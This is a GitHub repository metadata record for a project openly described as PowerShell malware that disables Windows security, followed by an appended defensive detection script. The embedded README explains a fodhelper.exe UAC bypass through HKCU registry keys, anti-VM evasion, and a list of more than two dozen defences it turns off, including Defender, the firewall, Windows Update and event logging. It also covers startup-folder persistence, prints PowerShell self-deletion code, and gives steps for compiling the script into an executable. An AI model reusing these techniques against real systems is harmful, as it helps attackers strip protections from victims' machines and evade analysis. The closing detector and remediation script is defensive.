{"id":14980259,"url":"https://github.com/ispique/fuck-windows-security","last_synced_at":"2025-10-27T23:40:21.402Z","repository":{"id":246816707,"uuid":"822147833","full_name":"isPique/Fuck-Windows-Security","owner":"isPique","description":"A PowerShell malware that disables all the Windows Security features with UAC Bypass and Anti-VM features. (Designed to work both as a powershell script and as an executable (.exe) file.)","archived":false,"fork":false,"pushed_at":"2025-05-24T16:30:54.000Z","size":160,"stargazers_count":36,"open_issues_count":2,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-06-05T10:50:22.801Z","etag":null,"topics":["bypass-uac","defender-kill","disable-windows-defender","disable-windows-defender-permanently","disable-windows-services","disable-windows-update","powershell","powershell-malware","powershell-script","privesc","privilege-escalation","registry","uac-bypass"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/isPique.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-06-30T12:10:37.000Z","updated_at":"2025-05-26T06:41:50.000Z","dependencies_parsed_at":null,"dependency_job_id":"d1617dd8-6bd6-4ce8-ba88-7289d40726b5","html_url":"https://github.com/isPique/Fuck-Windows-Security","commit_stats":null,"previous_names":["ispique/fuck-windows-security"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/isPique/Fuck-Windows-Security","repository_url":"https://repos.ecosyst
e.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/isPique","download_url":"https://codeload.github.com/isPique/Fuck-Windows-Security/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/isPique%2FFuck-Windows-Security/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281361405,"owners_count":26487881,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-27T02:00:05.855Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-uac","defender-kill","disable-windows-defender","disable-windows-defender-permanently","disable-windows-services","disable-windows-update","powershell","powershell-malware","powershell-script","privesc","privilege-escalation","registry","uac-bypass"],"created_at":"2024-09-24T14:01:31.414Z","updated_at":"2025-10-27T23:40:21.396Z","avatar_url":"https://github.com/isPique.png","language":"PowerShell","funding_links":[],"categories":[],"sub_
categories":[],"readme":"\u003e [!CAUTION]\n\u003e ## MALWARE AHEAD! IF YOU DO NOT KNOW WHAT THAT IS, LEAVE.\n\u003cdiv align=center\u003e\n\n\u003cimg src=\"https://github.com/isPique/Fuck-Windows-Security/blob/main/disclaimer.png\" width=\"700\"\u003e\n\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n\u003e [!WARNING]\n\u003e ***This script was NOT optimized to shorten and obfuscate the code but rather intended to have as much readability as possible for new coders to learn!***\n\n# How does it work?\n\n* Well, if we want to disable Windows' security features, we can use **Registry Editor** for that. However, most of the relevant keys live under HKLM, so we will need administrative privileges to change them. Like who's gonna run a malware as administrator?\n\n* First, the script checks whether it is running in a virtual environment; if it is, it deletes itself.\n\n\u003e [!NOTE]\n\u003e The Anti-VM feature in this script was written by referencing Metasploit's \"[checkvm](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb)\" module.\n\n| Currently Supported VMs | Status |\n|-------------------------|----------|\n| [Parallels](https://www.parallels.com) | Tested ✅ |\n| [Hyper-V](https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/about) | Tested ✅ |\n| [VMware](https://www.vmware.com) | Tested ✅ |\n| [VirtualBox](https://www.virtualbox.org) | Tested ✅ |\n| [Xen](https://xenproject.org) | Tested ✅ |\n| [QEMU/KVM](https://www.qemu.org) | Tested ✅ |\n    \n## Privilege Escalation\n  \n- In Windows, when a user requests to open **“Manage Optional Features”** in Settings, a process is created under the name **“fodhelper.exe”**. 
This process runs elevated without a UAC prompt because it is a Microsoft-signed binary that Windows allows to auto-elevate.\n  \n- On start-up, **fodhelper.exe** looks up the following registry locations:\n  \n\u003e ```plaintext\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute\n\u003e HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\(default)\n\u003e ```\n  \n- Since these entries do not exist under HKCU by default, and HKCU is writable without elevation, we can create this structure ourselves and make fodhelper execute our script with higher privileges, bypassing **User Account Control (UAC)**.\n  \n## Features that the script will disable:\n```bash\n\u003e All The Windows Defender Features (including SmartScreen)\n\u003e Windows Recovery Environment (WinRE)\n\u003e Windows Firewall\n\u003e Windows Update\n\u003e System Restore\n\u003e Task Manager\n\u003e OneDrive\n\u003e Cortana\n\u003e Command Prompt (Cmd)\n\u003e Remote Desktop\n\u003e User Account Control (UAC)\n\u003e Windows Security Center\n\u003e Windows Error Reporting\n\u003e Remote Assistance\n\u003e Windows Update Medic Service\n\u003e Background Intelligent Transfer Service (BITS)\n\u003e Windows Script Host\n\u003e Event Logging\n\u003e Windows Security Notifications\n\u003e Windows Search\n\u003e Automatic Maintenance\n\u003e Device Guard\n\u003e Application Guard\n\u003e Windows Defender Exploit Guard\n\u003e Telemetry and Data Collection\n```\n  \n## Self Replication \u0026 Self Destruction\n  \n* After disabling the Windows Security features, the script copies itself to the startup folder under a random file name for persistence and deletes all traces of its execution.\n  \n* However, when the script is compiled and executed as an \".exe\" file, the running image is mapped into a process, and the process can no longer modify or delete its own file due to the **[File Locking 
Mechanism](https://en.wikipedia.org/wiki/File_locking)**.\n  \n* Since the file cannot delete itself after it has done its job, there are two alternatives for deleting it, both of which hand the deletion to a separate process that outlives the original:\n  \n```powershell\n# Resolve our own path: the .ps1 path when run as a script, the process image when compiled\n$ScriptPath = $MyInvocation.MyCommand.Path\n$ExePath = (Get-Process -Id $PID).Path\n$FullPath = if ($ScriptPath) { $ScriptPath } else { $ExePath }\n  \n# First alternative: Start another process to delete it (the delete only succeeds once this process has exited and released the lock)\nStart-Process powershell.exe -ArgumentList \"-NoProfile -Command `\"Remove-Item -Path '$FullPath' -Force -ErrorAction SilentlyContinue`\"\" -WindowStyle Hidden\n  \n# Second alternative: Create a temporary batch script that waits briefly (ping as a sleep), deletes the file, then deletes itself\n$tempScript = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), [System.IO.Path]::GetRandomFileName() + \".cmd\")\n$cmdContent = \"chcp 1252\" + [Environment]::NewLine + \"ping 127.0.0.1 -n 2 \u003e nul\" + [Environment]::NewLine + \"del /q /f `\"$FullPath`\"\" + [Environment]::NewLine + \"del /q /f %~f0\"\nSet-Content -Path $tempScript -Value $cmdContent\nStart-Process cmd.exe -ArgumentList \"/c $tempScript\" -WindowStyle Hidden\n```\n\u003e ***The first alternative is the one used in the script.***\n\n# How to convert the script into an executable?\n\n**1. Open PowerShell as administrator**\n\n**2. Install [PS2EXE](https://www.advancedinstaller.com/convert-powershell-to-exe)**\n\n  ```powershell\n  Install-Module ps2exe\n  ```\n\n**3. 
Open the GUI**\n\n  ```powershell\n  win-ps2exe\n  ```\n\n\u003e [!IMPORTANT]\n\u003e #### Once the script has been converted to an \".exe\" file, it can be flagged as:\n\u003e * [**Trojan:Win32/AgentTesla!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FAgentTesla!ml\u0026threatid=2147760503)\n\u003e * [**Trojan:Win32/Bearfoos.A!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FBearfoos.A!ml\u0026threatid=2147731250)\n\u003e * [**Trojan:Win32/Wacatac.B!ml**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Trojan%3AWin32%2FWacatac.H!ml\u0026threatid=2147814523)\n\n\u003chr\u003e\n\n\u003e [!TIP]\n\u003e ### If you executed the script, you can run the `Enable.reg` file to repair the damage it caused.\n\u003e Also open cmd as administrator and run this command to re-enable WinRE:\n```bash\nreagentc /enable\n```\n\n## Contributing\n\nI would really like to add an Escape-VM feature to this script, but it's a really complicated thing, so if you wanna help me you can open a pull request :)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fispique%2Ffuck-windows-security","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fispique%2Ffuck-windows-security","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fispique%2Ffuck-windows-security/lists"}
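The fodhelper.exe UAC bypass and the startup-folder persistence described in the README above both leave artifacts that a defender can look for: a per-user `ms-settings` ProgID under `HKCU:\Software\Classes` (which a clean profile does not have) and a recently written file in a Startup folder. The PowerShell script below is an added example written for this page, not code from the Fuck-Windows-Security repository. It assumes it is run in the context of the user whose HKCU hive is being inspected, uses only the registry path the README lists plus the standard per-user and all-users Startup folders, and the script name `Check-FodhelperHijack.ps1` and its parameters are hypothetical.

```powershell
<#
Added example (not part of the Fuck-Windows-Security repository).
Detects, and optionally removes, the HKCU ms-settings override that the fodhelper.exe
UAC bypass relies on, and lists recently written Startup-folder entries for triage.
Assumptions: run as the user whose HKCU hive should be inspected; no elevation needed
to read or delete HKCU keys, which is exactly why the bypass works in the first place.
#>
[CmdletBinding()]
param(
    [switch]$Remediate,           # delete the hijack key instead of only reporting it
    [int]$StartupLookbackDays = 7 # flag Startup entries written in the last N days
)

# The exact location the README says fodhelper.exe consults on start-up.
$HijackKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

function Test-FodhelperHijack {
    # Returns an object describing the override, or $null when the key is absent.
    if (-not (Test-Path -LiteralPath $HijackKey)) { return $null }
    $props = Get-ItemProperty -LiteralPath $HijackKey -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        Key             = $HijackKey
        Command         = $props.'(default)'     # payload that fodhelper will launch elevated
        DelegateExecute = $props.DelegateExecute # set (typically empty) so the command path is used
        User            = $env:USERNAME
    }
}

function Remove-FodhelperHijack {
    # Removing the whole per-user ms-settings ProgID restores the default lookup,
    # so fodhelper.exe falls back to the machine-wide handler again.
    $root = 'HKCU:\Software\Classes\ms-settings'
    if (Test-Path -LiteralPath $root) {
        Remove-Item -LiteralPath $root -Recurse -Force
        Write-Output "Removed $root"
    }
}

function Get-RecentStartupEntries {
    param([int]$Days)
    # The README says the script copies itself into the Startup folder under a random
    # name, so anything written there recently is worth a look.
    $folders = @(
        [Environment]::GetFolderPath('Startup'),
        [Environment]::GetFolderPath('CommonStartup')
    )
    $cutoff = (Get-Date).AddDays(-$Days)
    foreach ($folder in $folders) {
        if (Test-Path -LiteralPath $folder) {
            Get-ChildItem -LiteralPath $folder -File -Force |
                Where-Object { $_.LastWriteTime -ge $cutoff } |
                Select-Object FullName, LastWriteTime, Length
        }
    }
}

$hit = Test-FodhelperHijack
if ($hit) {
    Write-Warning "fodhelper UAC-bypass staging found under $($hit.Key)"
    $hit | Format-List
    if ($Remediate) { Remove-FodhelperHijack }
} else {
    Write-Output "No ms-settings override under HKCU (fodhelper hijack not staged)."
}

$startup = Get-RecentStartupEntries -Days $StartupLookbackDays
if ($startup) {
    Write-Warning "Startup entries written in the last $StartupLookbackDays day(s):"
    $startup | Format-Table -AutoSize
}
```

Run it as `.\Check-FodhelperHijack.ps1` to report only, or `.\Check-FodhelperHijack.ps1 -Remediate` to also delete the override; the Startup listing is a triage aid, not proof of infection, so review the files before removing them. Note that removing the key undoes only the staging for the next bypass; the Defender, firewall and other changes the README lists are made under HKLM and still need the repository's `Enable.reg` and `reagentc /enable` to revert.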